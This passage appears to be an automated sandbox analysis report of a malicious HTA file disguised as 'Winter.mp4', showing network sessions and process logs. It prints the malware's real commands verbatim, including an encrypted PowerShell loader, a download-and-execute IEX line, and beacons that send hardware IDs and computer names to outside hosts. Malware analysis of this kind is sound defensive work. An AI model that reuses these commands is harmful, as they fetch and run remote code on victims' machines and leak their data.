cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1585&rtt_var=597&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2130&delivery_rate=1828428&cwnd=227&unsent_bytes=0&cid=632efb6eaf301ba7&ts=861&x=0"
2024-12-29 08:25:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-29 08:25:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49969	104.21.80.1	443	7448	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 08:25:21 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2LCF5MWZE75RL6K0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1099 Host: crackerdolk.click
2024-12-29 08:25:21 UTC	1099	OUT	Data Raw: 2d 2d 32 4c 43 46 35 4d 57 5a 45 37 35 52 4c 36 4b 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 0d 0a 2d 2d 32 4c 43 46 35 4d 57 5a 45 37 35 52 4c 36 4b 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4c 43 46 35 4d 57 5a 45 37 35 52 4c 36 4b 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 0d 0a 2d 2d 32 4c 43 Data Ascii: --2LCF5MWZE75RL6K0Content-Disposition: form-data; name="hwid"36058DC784D611A1962CEBBDF1A894EB--2LCF5MWZE75RL6K0Content-Disposition: form-data; name="pid"1--2LCF5MWZE75RL6K0Content-Disposition: form-data; name="lid"jMw1IE--bigJ--2LC
2024-12-29 08:25:22 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 08:25:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=msih4ak7763bipmod0d58pllg3; expires=Thu, 24 Apr 2025 02:12:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U3IbhIme0X%2BOECkKghhO4oInULVn0g4OtIXA93AmITR%2F3xBrWsZTShnzkv69hvAvHA4adINJfLBVLidYHbNUr3MsLs3uWpWHJZxD7DtVZOlB4FM4Y1R32mlZmRxuoZxw1NEcTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9866253ac243e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1649&rtt_var=640&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2015&delivery_rate=1682997&cwnd=242&unsent_bytes=0&cid=11afde3245abb989&ts=1018&x=0"
2024-12-29 08:25:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-29 08:25:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49975	104.21.80.1	443	7448	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 08:25:23 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 113 Host: crackerdolk.click
2024-12-29 08:25:23 UTC	113	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 62 69 67 4a 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 33 36 30 35 38 44 43 37 38 34 44 36 31 31 41 31 39 36 32 43 45 42 42 44 46 31 41 38 39 34 45 42 Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--bigJ&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=36058DC784D611A1962CEBBDF1A894EB
2024-12-29 08:25:24 UTC	1126	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 08:25:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7h97o1bjpcto83rv538m4e9s7k; expires=Thu, 24 Apr 2025 02:12:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xzBfJQw0j%2FV9i9glZ9XhkmJklPOpldxcOaW3B64SE5spzO04DFiZuK6A1QDIczY4CW6dutnEI1of6xOZWUSxsJqEVm2UpmX2UATyhXYnVGoIGUHZGU0Vvt50tKj5iRhBqErDVQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f986633f9268c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=2024&rtt_var=778&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1015&delivery_rate=1389814&cwnd=223&unsent_bytes=0&cid=a88bf6e1db66d087&ts=808&x=0"
2024-12-29 08:25:24 UTC	218	IN	Data Raw: 64 34 0d 0a 5a 66 38 67 6d 2b 6d 4b 79 6e 4c 46 78 73 4b 51 6a 36 51 68 45 4e 4f 44 67 36 52 47 4c 51 5a 6f 33 54 66 42 71 4a 34 6e 31 32 6b 2b 68 41 4c 75 79 37 44 6f 47 72 47 79 73 75 4f 31 2b 41 35 4d 2f 4f 44 6d 77 7a 4d 44 64 51 43 79 52 35 32 48 70 68 4c 67 58 56 66 4a 45 71 2f 64 76 4a 5a 64 74 61 37 73 35 50 66 51 41 7a 7a 78 35 66 65 47 66 42 38 71 53 72 67 56 2b 35 6e 6a 43 36 78 4c 45 4e 30 61 75 59 48 2b 76 67 4b 32 2f 4a 36 2f 30 34 74 4b 66 4c 72 7a 39 64 45 72 52 48 55 64 74 42 6d 79 77 50 46 58 69 30 59 4d 6b 56 54 45 69 75 61 36 4c 62 61 75 6f 37 37 37 33 46 55 79 2f 36 48 6c 30 47 51 58 4e 6b 54 2f 55 75 4f 53 72 6c 71 4b 0d 0a Data Ascii: d4Zf8gm+mKynLFxsKQj6QhENODg6RGLQZo3TfBqJ4n12k+hALuy7DoGrGysuO1+A5M/ODmwzMDdQCyR52HphLgXVfJEq/dvJZdta7s5PfQAzzx5feGfB8qSrgV+5njC6xLEN0auYH+vgK2/J6/04tKfLrz9dErRHUdtBmywPFXi0YMkVTEiua6Lbauo7773FUy/6Hl0GQXNkT/UuOSrlqK
2024-12-29 08:25:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49982	185.161.251.21	443	7448	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 08:25:26 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2024-12-29 08:25:26 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Sun, 29 Dec 2024 08:25:26 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2024-12-29 08:25:26 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Target ID:	0
Start time:	03:22:57
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\Winter.mp4.hta"
Imagebase:	0x780000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:22:59
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF222AD4A4FCB003B17174060EB5530CE7B9E694D54704BBE85697431BEF0DF8FB39514E546913E627324B7912AABC2519CDC16270DB9302DBA4235A5922582F6D19012A6A61A182460E5328B98785BBCA6DC1EE54C29B492DD0169BBDF0AD22735B4539FAB41765D2C78D6094D4933B0B9AB21F2194145068591FA2819F5844A17C9B3FE88007ABFFD555866F7C9BF9A7AE7857BD7D50BB0B679FDB641E588F7BA6998B1E09201B6E7429AAF1B53408F5BB85F586C567D650066E38E837E6F9B238A1169DAF40AC32351DE3006C93F4A0AC7408E46D98D725B1062464B5E6E747BE24FBD1B7DFEFCFDCA53481D894F0A6D7A6DF2DBAE5990233F3B5DD4A1DBC0E0C606F80172B012B5490EF0B0CC77328D4A2E0767896493EA713FDF1226247FDBEA1DA14AADF2D96D9AB01E6D4547C26AE');$CsiZ=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((rOnH('507A6B6D525573745374576441776A59')),[byte[]]::new(16)).TransformFinalBlock($hcNM,0,$hcNM.Length)); & $CsiZ.Substring(0,3) $CsiZ.Substring(129)
Imagebase:	0xbd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:22:59
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:23:08
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))}
Imagebase:	0xbd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:23:08
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:25:03
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0xbd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 0A9B0000 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

!, xrefs: 0A9B009A

Memory Dump Source

Source File: 00000000.00000003.2163270112.000000000A9B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A9B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_a9b0000_mshta.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: e02846dfa88f2e01c35658a77e595ea1a090674f777647d62c844821bb5b4cfb
Instruction ID: 04e8ea01e5032534d2e88343b2083a9db5796b1ccbdda5e3bc016bceae1be525
Opcode Fuzzy Hash: e02846dfa88f2e01c35658a77e595ea1a090674f777647d62c844821bb5b4cfb
Instruction Fuzzy Hash: 86411731B24300AFDB288E948AC67AFB7D5EB44314F4045A9FD599B3A1C374EC41CB92

Function 05D10FC7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D10FCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D10FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D10F9F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D10FBF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D10FA7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Function 05D10FAF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2163316195.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_5d10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 6624, Parent PID: 2000COMMON

Executed Functions

Function 04D5CB78 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\V)m, xrefs: 04D5CE2F

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: \V)m
API String ID: 0-3219898122
Opcode ID: 17a0da6b309c83e7b3b0f6aae1e1af9aea33f1a119633cbcd129e4da22770dab
Instruction ID: 1d0306bcb37f84d8c130df68d819e5e33db76bdfc74e53757469bc9ba4ce9bfd
Opcode Fuzzy Hash: 17a0da6b309c83e7b3b0f6aae1e1af9aea33f1a119633cbcd129e4da22770dab
Instruction Fuzzy Hash: CBB14C70E103099FDF10CFA9C9857ADBBF2BF88B04F148529D815EB264EB74A845CB91

Function 04D5D448 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a1a1e54ef2dc4f62300a960b9cc63fa124be203dc3df2763a71971d5b7330f6
Instruction ID: b1ba1e365b37a3ef5311630d30409b45d2fe33f2f12e898533840a65e7e71c27
Opcode Fuzzy Hash: 6a1a1e54ef2dc4f62300a960b9cc63fa124be203dc3df2763a71971d5b7330f6
Instruction Fuzzy Hash: 9BB13D70E002198FDF10CFA9C9857ADBBF2BF89314F14C529D815EB2A4EB74A845CB91

Function 07921ED0 Relevance: 18.2, Strings: 14, Instructions: 723COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07922710
tLth, xrefs: 07922001
4'jq, xrefs: 07922704
4'jq, xrefs: 079225F6
4'jq, xrefs: 07922672
h2uh, xrefs: 0792230D
4'jq, xrefs: 07922100
4'jq, xrefs: 079227CC
x.sh, xrefs: 07922237
4'jq, xrefs: 079220F4
x.sh, xrefs: 0792281B
4'jq, xrefs: 079227D8
4'jq, xrefs: 079225EA
4'jq, xrefs: 07922666

Memory Dump Source

Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7920000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$h2uh$tLth$x.sh$x.sh
API String ID: 0-126770062
Opcode ID: 65200525aad6df9f102a5f00506ced6e140d69ed5873d67aae5156b7fc1f383f
Instruction ID: 4505a24592a77706c01dee5530be4c3e4e8da97e25ae782405610f18a09931b7
Opcode Fuzzy Hash: 65200525aad6df9f102a5f00506ced6e140d69ed5873d67aae5156b7fc1f383f
Instruction Fuzzy Hash: D94215B0B002149FCB14EF68C550B6EBBA6FF84314F558469E901AF359CB36DC86DBA1

Function 07921618 Relevance: 10.4, Strings: 8, Instructions: 385COMMON

Download Yara Rule

Strings

tPjq, xrefs: 07921914
$jq, xrefs: 079218B0
$jq, xrefs: 079218BC
$jq, xrefs: 079218CF
$jq, xrefs: 07921894
$jq, xrefs: 07921878
tPjq, xrefs: 07921920
$jq, xrefs: 079218DB

Memory Dump Source

Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7920000_powershell.jbxd

Similarity

API ID:
String ID: tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-1988145694
Opcode ID: 664faa56841ba8bff18f3c17879611bc23c901972a13dd4e4fe4aa3c40552704
Instruction ID: 9951089f49257eb80a17f0835ae92d32ba81da1a3e52116276eaef9df55eddef
Opcode Fuzzy Hash: 664faa56841ba8bff18f3c17879611bc23c901972a13dd4e4fe4aa3c40552704
Instruction Fuzzy Hash: C8C19DB57402298FCB14AB78995067EBBEADFC6304B18847BD501CB395CE31CD56C7A1

Function 04D59088 Relevance: 9.2, Strings: 7, Instructions: 481COMMON

Download Yara Rule

Strings

$jq, xrefs: 04D592A2
Hnq, xrefs: 04D5914E
h])m, xrefs: 04D592B2
8N)m, xrefs: 04D5A178
I)m, xrefs: 04D59C44
h])m, xrefs: 04D59C18
h])m, xrefs: 04D59756

Memory Dump Source

Source File: 00000002.00000002.2147479526.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4d50000_powershell.jbxd

Similarity

API ID:
String ID: 8N)m$Hnq$h])m$h])m$h])m$$jq$I)m
API String ID: 0-524076932
